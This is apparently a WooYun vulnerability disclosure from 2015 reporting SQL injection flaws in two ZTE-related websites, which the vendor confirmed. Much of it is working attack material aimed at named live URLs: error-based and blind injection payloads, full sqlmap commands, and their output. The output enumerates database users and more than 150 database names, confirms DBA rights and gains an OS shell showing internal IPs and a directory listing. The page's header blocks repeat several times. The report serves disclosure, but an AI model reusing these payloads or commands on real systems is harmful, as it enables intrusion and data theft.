中兴多个SQL注入打包提交(显错注入\DBA权限\150个数据库)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155134

漏洞标题：中兴多个SQL注入打包提交(显错注入\DBA权限\150个数据库)

漏洞作者： harbour_bin

提交时间：2015-11-23 10:14

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-23：细节已通知厂商并且等待厂商处理中
2015-11-23：厂商已经确认，细节仅向厂商公开
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

详细说明：

1、

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35

显错注入

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=@@version
版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) Jul  9 2008 14:17:44 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=user
用户名:sql_zfkj2014
http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=db_name()
数据库:zhongxingchangtian

SqlMap跑一下:

D:\Python>python sqlmap\sqlmap.py -u "http://www.zte-v.com.cn/Plus/SubForm.aspx?
FID=2&NodeID=35" --dbs --users --is-dba
[*] starting at 09:20:24
[09:20:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:20:24] [INFO] testing connection to the target URL
[09:20:25] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: NodeID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: FID=2&NodeID=35 AND 3907=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CH
AR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3907=3907) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(98)+CHAR(113)))
---
[09:20:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:20:25] [INFO] testing if current user is DBA
current user is DBA:    False
[09:20:25] [INFO] fetching database users
[09:20:25] [INFO] the SQL query used returns 2 entries
[09:20:25] [INFO] resumed: sa
[09:20:25] [INFO] resumed: sql_zfkj2014
database management system users [2]:
[*] sa
[*] sql_zfkj2014
[09:20:25] [INFO] fetching database names
[09:20:25] [INFO] the SQL query used returns 129 entries
available databases [129]:
[*] aolanduo
[*] BDQN_cn
[*] chengjumeng
[*] chengkaijianzhu
[*] chengmingshi
[*] chengxiangyitihua
[*] cjt
[*] CJZFSql
[*] collage
[*] Curative
[*] daikuan
[*] daoerdun
[*] DFS_SALES_SYSTEM
[*] DFS_WLDDJS
[*] dfsahhygl
[*] dhlgclkx
[*] dishuiju
[*] donghualigonghuaxue
[*] dongshengzhongzhu
[*] DT_hr
[*] DT_sys
[*] dtle
[*] fenghuang
[*] FindDemo
[*] GuiHuaSheJi
[*] guozhiwjj
[*] haobang
[*] haohanguanwang
[*] helafushi
[*] hengzhilaowu
[*] hongrunhuagong
[*] huazhong
[*] HuaZhongJiaoTong
[*] hxtx580
[*] jiangxiluohekeji
[*] jiankangguoji
[*] jidianweiwang
[*] jingpinkecheng
[*] JingYinJiaoYu
[*] jinpaizhoupu
[*] jiuxinzhubao
[*] jiuzhongyuantaoci
[*] jxpufa
[*] jxsifa
[*] kangsheng
[*] kaoshi
[*] kehuanshiye
[*] kongtiao
[*] kongtiao7
[*] kunyuanduanxinpingtai
[*] kunyuanduanxinpingtai_1
[*] LC_MTF_DATA
[*] LEDa1
[*] LEDb
[*] lianjing
[*] liansi
[*] loushanglou
[*] lsfwq
[*] lvdu
[*] master
[*] MeiRongMeiFa
[*] message
[*] model
[*] msdb
[*] nanchangzongfuwuqu
[*] nchkyyxy
[*] ncjjzxw
[*] NongGongDang
[*] NPSMSPlatform
[*] OAManage
[*] poyangfuwuqu
[*] pushikeji
[*] qishishengwu
[*] Recovered_changjiangsike
[*] Recovered_lingsuyaoye
[*] ReportServer
[*] ReportServerTempDB
[*] shanggaotongxun
[*] shekewang
[*] shengnvzizhongzhuan
[*] shinianshijue
[*] shuguangjituan
[*] shuilishuidian
[*] shuilishuidianyw
[*] shuiwujituan
[*] shunshengjiangong
[*] smart
[*] StudentFrance
[*] taiguoborendx
[*] tempdb
[*] tfr245077
[*] Tour1
[*] Tour2
[*] UFDATA_001_2014
[*] UFDATA_001_2015
[*] UFDATA_002_2015
[*] UFDATA_800_2014
[*] UFDATA_800_2015
[*] UFData_998_2012
[*] UFData_999_2011
[*] UfNote_001_2015
[*] UfNoteSys
[*] UFSub
[*] UFSystem
[*] wanxiang
[*] weishengxinxi
[*] wit_oa
[*] wuliyf
[*] xifuhui
[*] xinxiwang
[*] XinXiWang2
[*] xlzxyzbg
[*] yangzixiang
[*] Yd
[*] Yd1
[*] ynk
[*] yuanrenshequ
[*] yuansuhunli
[*] yumingqiangzhu1
[*] zfkj_doc
[*] zfkj_oa
[*] zfkj_sys
[*] ZFKJ_ZHJJ
[*] zhengzhongtang
[*] zhongxingchangtian
[*] ZHYQ
[*] zmbg
[*] Zufeng_HuaKai
[*] 网站保姆

129个数据库
2、

http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002

盲注

http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%27%20and%20len(user)=3%20and%201=1--
http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%27%20and%20len(db_name())=7%20and%201=1--

这个以前有人交过了, 没有修复,不是很重视啊

D:\Python>python sqlmap\sqlmap.py -u "http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002" --dbs --users --is-dba
[*] starting at 17:28:08
[17:28:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:28:08] [INFO] testing connection to the target URL
[17:28:10] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=ZTE002' AND 6106=6106 AND 'mUYy'='mUYy
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=ZTE002';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=ZTE002' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-9839' UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(
122)+CHAR(113)+CHAR(113)+CHAR(82)+CHAR(82)+CHAR(112)+CHAR(70)+CHAR(69)+CHAR(67)+
CHAR(70)+CHAR(71)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113),NU
LL,NULL,NULL--
---
[17:28:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[17:28:10] [INFO] testing if current user is DBA
current user is DBA:    True
[17:28:10] [INFO] fetching database users
[17:28:10] [INFO] the SQL query used returns 5 entries
[17:28:10] [INFO] resumed: ADO
[17:28:10] [INFO] resumed: ATTENDANCE
[17:28:10] [INFO] resumed: saa
[17:28:10] [INFO] resumed: saa
[17:28:10] [INFO] resumed: zte
database management system users [4]:
[*] ADO
[*] ATTENDANCE
[*] saa
[*] zte
[17:28:10] [INFO] fetching database names
[17:28:10] [INFO] the SQL query used returns 22 entries
available databases [21]:
[*] DotNetCms
[*] hotelplan
[*] hr
[*] hrTest
[*] Lsmis_nanJing
[*] Lsmis_shangHai
[*] Lsmis_xiAn
[*] master
[*] model
[*] msdb
[*] MyPhoto
[*] New iCall
[*] OfficeAnywhere
[*] Repertory
[*] ReportServer
[*] ReportServerTempDB
[*] SMS_Mail
[*] SSMISDIYDB
[*] tempdb
[*] TYCRM
[*] XL_Attendance

DBA权限

os-shell> ipconfig
command standard output:
---
Windows IP Configuration
Ethernet adapter 本地连接 4:
   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.66.1.188
   Subnet Mask . . . . . . . . . . . : 255.255.192.0
   Default Gateway . . . . . . . . . : 10.66.1.3
---

网站目录, 应该可以shell的, 不慢慢找了

command standard output:
---
 驱动器 G 中的卷没有标签。
 卷的序列号是 6858-E60F
 g:\ 的目录
2015-03-28  10:07    <DIR>          360Downloads
2013-10-10  08:53    <DIR>          arswp3
2011-12-07  16:48    <DIR>          DJKeygoe
2013-06-08  18:09    <DIR>          DotNetCms
2013-09-22  04:26         4,645,268 DotNetCms.rar
2014-08-14  08:12    <DIR>          DVSDAT
2015-03-18  09:10    <DIR>          faduanxin
2013-09-22  04:26           412,188 faduanxin.rar
2013-01-17  17:10    <DIR>          hotelplan
2013-09-22  04:21         3,764,416 hotelplan.rar
2011-08-02  15:56    <DIR>          iCall Setup
2013-05-07  11:29             7,358 logo.ico
2013-03-13  15:56    <DIR>          nanJing
2014-12-05  09:29         1,258,179 nanJing20141205.rar
2014-08-11  10:16    <DIR>          OANetdisk
2012-06-01  16:55    <DIR>          Office2007 Professional_简体中文专业版_微软
最新的office系列
2013-10-15  12:37    <DIR>          OfficeAnywhere
2013-09-06  14:19    <DIR>          OfficeAnywhere 开发用
2013-06-14  11:14    <DIR>          OfficeAnywhere2013-6-14
2013-12-12  14:52     2,668,474,968 OfficeAnywhere2013年12月12日143818.rar
2014-12-05  09:42     2,697,482,797 OfficeAnywhere20141205.rar
2013-05-17  11:21    <DIR>          OfficeAnywhere5-17
2013-05-21  19:04    <DIR>          OfficeAnywhere考勤修改
2013-03-21  10:21    <DIR>          pos基础环境
2014-01-22  18:44    <DIR>          Program Files
2013-10-10  08:53    <DIR>          rsc3
2013-05-17  11:33    <DIR>          shangHai
2014-12-05  09:29         1,434,263 shangHai20141205.rar
2013-09-10  10:09        38,435,064 sogou_explorer_4.1_0826.exe
2012-08-08  14:44    <DIR>          SSSoft
2013-05-07  11:51       390,704,410 SW_CD_Visio_Pro_2007.7z
2013-09-13  14:34    <DIR>          sybase_dll
2013-09-13  14:32           221,923 sybase_dll.rar
2013-03-21  17:02    <DIR>          WebSendMsg
2013-09-21  20:58    <DIR>          WebSite
2014-12-05  09:28         1,433,418 WebSite20141205.rar
2013-04-18  08:42    <DIR>          WebSite8
2015-01-05  11:00    <DIR>          WindowsApplication1
2013-09-22  02:27         1,512,925 WindowsApplication1.rar
2013-05-31  15:17    <DIR>          xiAn
2014-12-05  09:29         1,434,958 xiAn20141205.rar
2013-04-16  11:12    <DIR>          youxiangdizhi
2013-04-16  11:15       294,752,939 youxiangdizhi.rar
2013-06-19  18:44     1,240,469,589 youxiangdizhi2013年6月19日183847.rar
2015-03-18  19:44    <DIR>          ztehoteloa
2013-09-22  04:26         1,238,502 ztehoteloa.rar
2013-10-22  10:28    <DIR>          [fuliba.net]某酒店2000W数据(解压密码：sjisau
isa是就数据8很舒适好sjjss)(20131021234529)
2013-10-22  09:47     1,834,815,332 [fuliba.net]某酒店2000W数据(解压密码：sjisau
isa是就数据8很舒适好sjjss)(20131021234529).rar
2013-05-31  15:44    <DIR>          仓库系统2013年5月31日修改前
2013-03-05  21:17    <DIR>          和泰报表勿动
2013-04-08  08:48           159,350 和泰报表勿动.rar
2013-08-05  11:57             2,556 在指定位置添加点对象.htm
2013-08-05  11:57    <DIR>          在指定位置添加点对象_files
2014-11-18  10:32    <DIR>          官网
2013-10-10  08:53    <DIR>          恶意软件清理助手 v2.82
2013-02-18  08:49            12,741 截图00.jpg
---

漏洞证明：

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35

http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002

PS：具体数据不跑了, 危害还是比较大的; 如果危害不够, 可以补充

修复方案：

过滤

版权声明：转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-11-23 14:31

厂商回复：

感谢提交～

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155134

漏洞标题：中兴多个SQL注入打包提交(显错注入\DBA权限\150个数据库)

相关厂商：中兴通讯股份有限公司

漏洞作者： harbour_bin

提交时间：2015-11-23 10:14

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155134

漏洞标题：中兴多个SQL注入打包提交(显错注入\DBA权限\150个数据库)

相关厂商：中兴通讯股份有限公司

漏洞作者： harbour_bin

提交时间：2015-11-23 10:14

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155134"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：